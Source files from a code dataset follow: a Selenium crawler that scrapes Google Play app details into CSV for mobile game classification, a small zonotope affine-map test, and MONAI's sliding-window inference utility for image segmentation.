    def explore_packages(self):\n        \"\"\"\n        Click the see-more button, parse similar apps from this page, and return their\n        package names in a python set.\n\n        Returns: set{str, str, ... , str}\n        \"\"\"\n        def scroll_down(driver, clicks):\n            for _ in range(clicks):\n                ActionChains(driver).key_down(Keys.DOWN).perform()\n\n        res = set()\n        try:\n            self.driver.find_element_by_xpath(\n                \"//a[@aria-label and text() = 'See more']\").click()\n            # scroll_down(self.driver, 50)\n            time.sleep(1)\n            for elem in self.driver.find_elements_by_xpath(\"//span[@class = 'preview-overlay-container']\"):\n                res.add(elem.get_attribute('data-docid'))\n        except Exception as e:\n            print(e)\n        return res\n\n\nclass PackageInfoWriter:\n    \"\"\"\n    Converts app info dicts to feature vectors and buffers them. The buffer is\n    periodically written to the target path.\n\n    Parameters\n    ----------\n    csv_path: str\n        the csv file to write data\n    period: int\n        the number of rows to buffer before writing to csv file\n    strict_mode: bool\n        skip the package if at least one attribute is missing\n    \"\"\"\n    def __init__(self, csv_path, period, strict_mode):\n        \"\"\"\n        csv_path: str\n            the csv file to write data\n        period: int\n            the number of rows to buffer before writing to csv file\n        strict_mode: bool\n            skip the package if at least one attribute is missing\n\n        Returns: None\n        \"\"\"\n        self.buffer, self.count = [], 0\n        self.path, self.period, self.strict = csv_path, period, strict_mode\n\n    def write(self):\n        \"\"\"\n        Write (append) the buffered rows to a csv file and clear the buffer.\n\n        Returns: None\n        \"\"\"\n        with open(self.path, 'a', encoding='utf-8', newline='') as fout:\n            csvout = csv.writer(fout)\n            csvout.writerows(self.buffer)\n        self.buffer = []\n\n    def process_dic(self, dic, package):\n        \"\"\"\n        Given a package and its info dict, convert the dict to a vector based on the\n        attributes specified in HEADERS['full'], replace missing trivial attributes\n        with '???', then append it to the buffer.\n\n        dic: dict{str: str, ... str: str}\n            the info dict parsed from a Google Play page\n        package: str\n            the name of the package\n\n        Returns: bool, whether the row was accepted into the buffer\n        \"\"\"\n\n        def vectorize_dic(dic, package):\n            for key in HEADERS['trivial']:\n                dic[key] = dic.get(key, '???')\n            dic['Package'] = package\n            return [dic.get(key, '').replace('\\n', ' ') for key in HEADERS['full']]\n\n        vec = vectorize_dic(dic, package=package)\n        if len(dic) < 10 or (self.strict and '' in vec):\n            print('package %s missing property %d' %\n                  (package, vec.index('')))\n            return False\n\n        self.buffer.append(vec)\n        self.count += 1\n        if self.count % self.period == 0:\n            self.write()\n        return True\n\n    def close(self):\n        \"\"\"\n        Write the remaining buffered rows to the csv file.\n\n        Returns: None\n        \"\"\"\n        self.write()\n\n\n
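# Buffering sketch (names from this file, values illustrative): rows accumulate\n# in memory and are flushed to the csv every `period` accepted packages:\n#   writer = PackageInfoWriter('raw/0.csv', 5, strict_mode=False)\n#   writer.process_dic(parsed_dic, 'com.example.app')  # hypothetical package\n#   writer.close()  # flush whatever is still buffered\n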
def scheduler(Q1, Q2, verbose):\n    \"\"\"\n    A process that repeatedly sends packages to worker processes based on a BFS-search\n    approach and fetches additional packages from the worker processes, appending them\n    to the BFS queue. Can only be terminated by Ctrl-C. Note that visited packages and\n    the bfs-queue will be saved to and restored from \"./log/scrape.json\".\n\n    Q1: multiprocessing.Queue object\n    Q2: multiprocessing.Queue object\n    verbose: bool\n\n    Returns: None\n    \"\"\"\n    try:\n        with open('log/scrape.json', 'r') as fin:\n            visited, queue = json.load(fin)\n        visited = set(visited)\n    except OSError:\n        visited = set()\n        queue = START_PACKAGES\n\n    count = 0\n    stop_flag = False\n    try:\n        while True:\n            while queue:\n                try:\n                    if queue[0] not in visited:\n                        Q1.put(queue[0], block=False)\n                        visited.add(queue[0])\n                        count += 1\n                    queue.pop(0)\n                except Full:\n                    break\n            else:\n                if stop_flag:\n                    break\n                else:\n                    stop_flag = True\n            while True:\n                try:\n                    if stop_flag:\n                        pkg = Q2.get(timeout=30)\n                    else:\n                        pkg = Q2.get(block=False)\n                    stop_flag = False\n                    if pkg not in visited and pkg not in queue and len(queue) < 100000:\n                        queue.append(pkg)\n                except Empty:\n                    break\n            if count % 100 == 0:\n                count = 1\n                if verbose:\n                    print('storing data, current length of queue is %d' %\n                          len(queue))\n                with open('log/scrape.json', 'w') as fout:\n                    json.dump([list(visited), queue], fout, indent=4)\n    finally:\n        with open('log/scrape.json', 'w') as fout:\n            json.dump([list(visited), queue], fout, indent=4)\n\n\ndef crawl(Q1, Q2, pid, args):\n    \"\"\"\n    The worker process that consumes packages from the scheduler process, scrapes each\n    one from Google Play, parses it into a python dict, writes it to a csv file, and\n    sends more packages to the scheduler. Can only be terminated by Ctrl-C.\n\n    Q1: multiprocessing.Queue object\n    Q2: multiprocessing.Queue object\n    pid: int\n    args: argparse.Namespace object\n\n    Returns: None\n    \"\"\"\n    print('Process %d started...' % pid)\n    options = Options()\n    options.add_experimental_option(\n        'prefs', {'intl.accept_languages': 'en,en_US'})\n    if args.headless:\n        options.add_argument('--headless')\n    options.add_argument('--log-level=3')\n    driver = webdriver.Chrome(executable_path=CHROME_PATH, options=options)\n    writer = PackageInfoWriter('raw/%d.csv' % pid, 5, args.strict)\n    crawler = Crawler(driver)\n\n    try:\n        while True:\n            try:\n                package = Q1.get(timeout=120)\n            except Empty:\n                break\n            crawler.get_page_by_package(package)\n            dic = crawler.parse_current_page()\n            if 'Category' in dic and dic['Category'].replace(' ', '_') in CATEGORIES:\n                dic['Category'] = dic['Category'].replace(' ', '_')\n                print('[%d] %s %s' % (pid, package, dic['Category']))\n                writer.process_dic(dic, package)\n                new_pkgs = crawler.explore_packages()\n                if args.verbose:\n                    print('appending %d packages to queue' % len(new_pkgs))\n                for pkg in new_pkgs:\n                    Q2.put(pkg)\n    except Exception as e:\n        print(e)\n    finally:\n        print('Process %d exit...' % pid)\n        driver.quit()\n        writer.close()\n\n\n
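# Queue topology used above: the scheduler feeds package names to the workers\n# over Q1 and receives newly discovered packages back over Q2.\n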
def main(args):\n    \"\"\"\n    Create two multiprocessing.Queue objects for communication between scheduler and\n    workers, then start one scheduler process and n (specified by args.n, default 8)\n    worker processes.\n\n    args: argparse.Namespace object\n\n    Returns: None\n    \"\"\"\n    Q1 = mp.Queue(maxsize=20)\n    Q2 = mp.Queue(maxsize=1000)\n    mp.Process(target=scheduler, args=(Q1, Q2, args.verbose)).start()\n    for i in range(args.n):\n        mp.Process(target=crawl, args=(Q1, Q2, i, args)).start()\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-n',\n                        type=int,\n                        default=8,\n                        help=\"the number of worker processes to use (default: 8)\")\n    parser.add_argument('--headless',\n                        action='store_true',\n                        help=\"use the headless version of Chrome\")\n    parser.add_argument('--strict',\n                        action='store_true',\n                        help=\"skip the package if at least one attribute is missing\")\n    parser.add_argument('-v', '--verbose',\n                        action='store_true',\n                        help=\"increase verbosity\")\n    args = parser.parse_args()\n    main(args)\n","repo_name":"yanlinf/MobileGameClassification","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":12764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23047041647","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport numpy as np\n\nos.chdir('tests/')\nsys.path.append(\"..\")\n\nfrom engine.set.zono import Zono\n\ndef main():\n    dim = 4\n    C = np.ones(dim).reshape(-1, 1)\n    V = np.eye(dim)\n    Z = Zono(C, V)\n\n    W = np.random.rand(dim, dim)\n    b = np.random.rand(dim, 1)\n\n    print('W: \\n', W)\n    print('b: \\n', b)\n\n    Z1 = Z.affineMap(W, b)\n    print(Z1)\n    print(Z1.__repr__())\n\n\nif __name__ == '__main__':\n    main() ","repo_name":"V2A2/StarV_temp","sub_path":"tests/set/zono/test_zono_affineMap.py","file_name":"test_zono_affineMap.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8958812293","text":"from typing import Callable, Optional, Sequence, Tuple, Union\n\nimport torch\nimport torch.nn.functional as F\n\nfrom monai.data.utils import compute_importance_map, dense_patch_slices, get_valid_patch_size\nfrom monai.utils import BlendMode, PytorchPadMode, fall_back_tuple\n\n\ndef sliding_window_inference(\n    inputs: torch.Tensor,\n    roi_size: Union[Sequence[int], int],\n    sw_batch_size: int,\n    predictor: Callable[[torch.Tensor], torch.Tensor],\n    overlap: float = 0.25,\n    mode: Union[BlendMode, str] = BlendMode.CONSTANT,\n    sigma_scale: Union[Sequence[float], float] = 0.125,\n    padding_mode: Union[PytorchPadMode, str] = PytorchPadMode.CONSTANT,\n    cval: float = 0.0,\n    device: Optional[torch.device] = None,\n) -> torch.Tensor:\n    \"\"\"\n    Sliding window inference on `inputs` with `predictor`.\n\n    When roi_size is larger than the inputs' spatial size, the input image is padded during inference.\n    To maintain the same spatial sizes, the output image will be cropped to the original input size.\n\n    Args:\n        inputs: input image to be processed (assuming NCHW[D])\n        roi_size: the spatial window size for inferences.\n            When its components have None or non-positives, the corresponding inputs dimension will be used.\n            if the components of the `roi_size` are non-positive values, the transform will use the\n            corresponding components of img size. 
For example, `roi_size=(32, -1)` will be adapted\n to `(32, 64)` if the second spatial dimension size of img is `64`.\n sw_batch_size: the batch size to run window slices.\n predictor: given input tensor `patch_data` in shape NCHW[D], `predictor(patch_data)`\n should return a prediction with the same spatial shape and batch_size, i.e. NMHW[D];\n where HW[D] represents the patch spatial size, M is the number of output channels, N is `sw_batch_size`.\n overlap: Amount of overlap between scans.\n mode: {``\"constant\"``, ``\"gaussian\"``}\n How to blend output of overlapping windows. Defaults to ``\"constant\"``.\n\n - ``\"constant``\": gives equal weight to all predictions.\n - ``\"gaussian``\": gives less weight to predictions on edges of windows.\n\n sigma_scale: the standard deviation coefficient of the Gaussian window when `mode` is ``\"gaussian\"``.\n Default: 0.125. Actual window sigma is ``sigma_scale`` * ``dim_size``.\n When sigma_scale is a sequence of floats, the values denote sigma_scale at the corresponding\n spatial dimensions.\n padding_mode: {``\"constant\"``, ``\"reflect\"``, ``\"replicate\"``, ``\"circular\"``}\n Padding mode for ``inputs``, when ``roi_size`` is larger than inputs. Defaults to ``\"constant\"``\n See also: https://pytorch.org/docs/stable/nn.functional.html#pad\n cval: fill value for 'constant' padding mode. Default: 0\n device: device running the concatenation of the windows.\n By default the device and accordingly the memory of the input device is used. If for example\n set to device=torch.device('cpu') the gpu memory consumption is less and independent of the\n input and roi_size parameter. Output is on the device set or if not set the inputs device.\n\n Raises:\n NotImplementedError: When ``inputs`` does not have batch size = 1.\n\n Note:\n - input must be channel-first and have a batch dim, support both spatial 2D and 3D.\n - currently only supports `inputs` with batch_size=1.\n\n \"\"\"\n num_spatial_dims = len(inputs.shape) - 2\n assert 0 <= overlap < 1, \"overlap must be >= 0 and < 1.\"\n\n # determine image spatial size and batch size\n # Note: all input images must have the same image size and batch size\n image_size_ = list(inputs.shape[2:])\n batch_size = inputs.shape[0]\n\n # TODO: Enable batch sizes > 1 in future\n if batch_size > 1:\n raise NotImplementedError(\"Currently only inputs with batch size = 1 are supported.\")\n\n if device is None:\n device = inputs.device\n\n roi_size = fall_back_tuple(roi_size, image_size_)\n # in case that image size is smaller than roi size\n image_size = tuple(max(image_size_[i], roi_size[i]) for i in range(num_spatial_dims))\n pad_size = []\n for k in range(len(inputs.shape) - 1, 1, -1):\n diff = max(roi_size[k - 2] - inputs.shape[k], 0)\n half = diff // 2\n pad_size.extend([half, diff - half])\n inputs = F.pad(inputs, pad=pad_size, mode=PytorchPadMode(padding_mode).value, value=cval)\n\n scan_interval = _get_scan_interval(image_size, roi_size, num_spatial_dims, overlap)\n\n # Store all slices in list\n slices = dense_patch_slices(image_size, roi_size, scan_interval)\n\n slice_batches = []\n for slice_index in range(0, len(slices), sw_batch_size):\n slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices)))\n input_slices = []\n for curr_index in slice_index_range:\n curr_slice = slices[curr_index]\n if len(curr_slice) == 3:\n input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1], curr_slice[2]])\n else:\n input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1]])\n 
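# Patches in input_slices all share the spatial shape roi_size (dense_patch_slices\n        # produces equal-sized windows), so they can be stacked into one predictor batch.\n        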
slice_batches.append(torch.stack(input_slices))\n\n # Perform predictions\n output_rois = list()\n for data in slice_batches:\n seg_prob = predictor(data) # batched patch segmentation\n output_rois.append(seg_prob.to(device))\n\n # stitching output image\n output_classes = output_rois[0].shape[1]\n output_shape = [batch_size, output_classes] + list(image_size)\n\n # Create importance map\n importance_map = compute_importance_map(\n get_valid_patch_size(image_size, roi_size), mode=mode, sigma_scale=sigma_scale, device=device\n )\n\n # allocate memory to store the full output and the count for overlapping parts\n output_image = torch.zeros(output_shape, dtype=torch.float32, device=device)\n count_map = torch.zeros(output_shape, dtype=torch.float32, device=device)\n\n for window_id, slice_index in enumerate(range(0, len(slices), sw_batch_size)):\n slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices)))\n\n # store the result in the proper location of the full output. Apply weights from importance map.\n for curr_index in slice_index_range:\n curr_slice = slices[curr_index]\n if len(curr_slice) == 3:\n output_image[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += (\n importance_map * output_rois[window_id][curr_index - slice_index, :]\n )\n count_map[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += importance_map\n else:\n output_image[0, :, curr_slice[0], curr_slice[1]] += (\n importance_map * output_rois[window_id][curr_index - slice_index, :]\n )\n count_map[0, :, curr_slice[0], curr_slice[1]] += importance_map\n\n # account for any overlapping sections\n output_image = output_image / count_map\n\n if num_spatial_dims == 3:\n return output_image[\n ...,\n pad_size[4] : image_size_[0] + pad_size[4],\n pad_size[2] : image_size_[1] + pad_size[2],\n pad_size[0] : image_size_[2] + pad_size[0],\n ]\n return output_image[\n ..., pad_size[2] : image_size_[0] + pad_size[2], pad_size[0] : image_size_[1] + pad_size[0]\n ] # 2D\n\n\ndef _get_scan_interval(\n image_size: Sequence[int], roi_size: Sequence[int], num_spatial_dims: int, overlap: float\n) -> Tuple[int, ...]:\n \"\"\"\n Compute scan interval according to the image size, roi size and overlap.\n Scan interval will be `int((1 - overlap) * roi_size)`, if interval is 0,\n use 1 instead to make sure sliding window works.\n\n \"\"\"\n if len(image_size) != num_spatial_dims:\n raise ValueError(\"image coord different from spatial dims.\")\n if len(roi_size) != num_spatial_dims:\n raise ValueError(\"roi coord different from spatial dims.\")\n\n scan_interval = []\n for i in range(num_spatial_dims):\n if roi_size[i] == image_size[i]:\n scan_interval.append(int(roi_size[i]))\n else:\n interval = int(roi_size[i] * (1 - overlap))\n scan_interval.append(interval if interval > 0 else 1)\n return tuple(scan_interval)\n","repo_name":"precision-medicine-um/MONAI-Deep_Learning","sub_path":"monai/inferers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}